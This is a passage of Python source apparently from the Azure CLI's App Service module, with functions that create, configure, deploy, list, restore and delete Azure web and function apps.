from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
HybridConnection, RampUpRule, UnauthenticatedClientAction,
ManagedServiceIdentity, DeletedAppRestoreRequest,
DefaultErrorResponseException, SnapshotRestoreRequest,
SnapshotRecoverySource, SwiftVirtualNetwork, HostingEnvironmentProfile)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.mgmt.network.models import Delegation
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (RUNTIME_TO_DEFAULT_VERSION, NODE_VERSION_DEFAULT_FUNCTIONAPP,
RUNTIME_TO_IMAGE_FUNCTIONAPP, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
website_run_from_package = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)):
logger.warning("Setting ENABLE_ORYX_BUILD to true")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=true",
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
time.sleep(5)
if website_run_from_package is not None:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
time.sleep(5)
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if not ((enable_oryx_build is False) and (scm_do_build_during_deployment is False)):
logger.warning("Setting ENABLE_ORYX_BUILD to false")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=false",
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
time.sleep(5)
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(src_plan_info) or is_plan_elastic_premium(src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(dest_plan_instance) or is_plan_elastic_premium(dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None,
linux_fx_version=None, windows_fx_version=None, reserved_instance_count=None, php_version=None, # pylint: disable=unused-argument
python_version=None, net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
